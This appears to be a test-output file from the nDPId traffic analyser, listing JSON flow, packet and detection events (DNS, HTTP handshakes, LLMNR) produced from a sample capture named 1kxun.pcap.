00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1470104379115,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"},"dns": {"query":"pic.1kxun.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"106.187.35.246"}}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379117,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379117,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379117,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379117,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdVAAIAG5ozAqHMIarsj9sHAAFAm5\/RZAAAAAIACIACwJAAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1470104379117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdVAAIAG5ozAqHMIarsj9sHAAFAm5\/RZAAAAAIACIACwJAAAAgQE7AEDAwgBAQQC"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdZAAIAG5ovAqHMIarsj9sHBAFDavRsQAAAAAIACIADVlgAAAgQE7AEDAwgBAQQC"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdZAAIAG5ovAqHMIarsj9sHBAFDavRsQAAAAAIACIADVlgAAAgQE7AEDAwgBAQQC"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UddAAIAG5orAqHMIarsj9sHCAFAX8\/CKAAAAAIACIADC5QAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UddAAIAG5orAqHMIarsj9sHCAFAX8\/CKAAAAAIACIADC5QAAAgQE7AEDAwgBAQQC"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdhAAIAG5onAqHMIarsj9sHDAFDIiN5cAAAAAIACIAAkfQAAAgQE7AEDAwgBAQQC"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1470104379119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdhAAIAG5onAqHMIarsj9sHDAFDIiN5cAAAAAIACIAAkfQAAAgQE7AEDAwgBAQQC"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379119,"flow_last_seen":1470104379119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379119,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1470104379119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdlAAIAG5ojAqHMIarsj9sHEAFAS7Ia1AAAAAIACIAAxwAAAAgQE7AEDAwgBAQQC"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1470104379119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdlAAIAG5ojAqHMIarsj9sHEAFAS7Ia1AAAAAIACIAAxwAAAAgQE7AEDAwgBAQQC"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379117,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379117,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379117,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379117,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdVAAIAG5ozAqHMIarsj9sHAAFAm5\/RZAAAAAIACIACwJAAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdVAAIAG5ozAqHMIarsj9sHAAFAm5\/RZAAAAAIACIACwJAAAAgQE7AEDAwgBAQQC"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdZAAIAG5ovAqHMIarsj9sHBAFDavRsQAAAAAIACIADVlgAAAgQE7AEDAwgBAQQC"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdZAAIAG5ovAqHMIarsj9sHBAFDavRsQAAAAAIACIADVlgAAAgQE7AEDAwgBAQQC"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UddAAIAG5orAqHMIarsj9sHCAFAX8\/CKAAAAAIACIADC5QAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UddAAIAG5orAqHMIarsj9sHCAFAX8\/CKAAAAAIACIADC5QAAAgQE7AEDAwgBAQQC"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdhAAIAG5onAqHMIarsj9sHDAFDIiN5cAAAAAIACIAAkfQAAAgQE7AEDAwgBAQQC"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1470104379119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdhAAIAG5onAqHMIarsj9sHDAFDIiN5cAAAAAIACIAAkfQAAAgQE7AEDAwgBAQQC"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379119,"flow_last_seen":1470104379119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379119,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1470104379119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdlAAIAG5ojAqHMIarsj9sHEAFAS7Ia1AAAAAIACIAAxwAAAAgQE7AEDAwgBAQQC"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1470104379119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdlAAIAG5ojAqHMIarsj9sHEAFAS7Ia1AAAAAIACIAAxwAAAAgQE7AEDAwgBAQQC"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1470104379169,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104379169,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD1mgU6wAmi+DsIAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="}
00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1470104379169,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1470104379169,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KxkAAAER6ZbAqANf4AAA\/NZoFOsAJg3d7CAAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"}
00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1470104379169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379169,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcB6nEL4Juf0WoASchCfpwAAAgQFtAEBBAIBAwMH"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcSHsZvpEuyGtoASchC7PAAAAgQFtAEBBAIBAwMH"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcHaep2g2r0bEYASchAKkwAAAgQFtAEBBAIBAwMH"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwb\/T2SVtRRe+4IASchB7QAAAAgQFtAEBBAIBAwMH"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcLBVjGFF\/Pwi4ASchB9IQAAAgQFtAEBBAIBAwMH"}
